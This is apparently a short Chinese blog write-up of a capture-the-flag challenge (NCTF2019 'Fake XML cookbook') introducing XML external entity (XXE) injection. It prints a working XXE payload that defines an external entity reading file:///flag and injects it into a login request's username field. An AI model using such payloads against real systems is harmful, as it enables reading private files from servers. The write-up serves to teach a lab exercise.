Loading

BUUFTC-日刷-[NCTF2019]Fake XML cookbook-xxe入门

登入抓包

可以发现数据是以xml格式传入的,登入失败会返回账号,同样是xml格式

而xml格式可以引用外部实体(可以是本地文件)

 尝试传入

<?xml version = "1.0" encoding = "utf-8"?>
<!DOCTYPE user [
<!ENTITY file SYSTEM "file:///flag">
]>
<user><username>&file;</username><password>zhangwei666</password></user>

题目没啥意思,主要记录下xxe的脚本

 

posted @ 2021-12-01 14:46  Aninock  阅读(6)  评论(0编辑  收藏  举报